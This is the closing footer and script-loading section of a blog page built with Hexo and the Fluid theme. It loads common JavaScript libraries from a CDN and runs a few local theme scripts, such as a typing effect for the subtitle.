     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
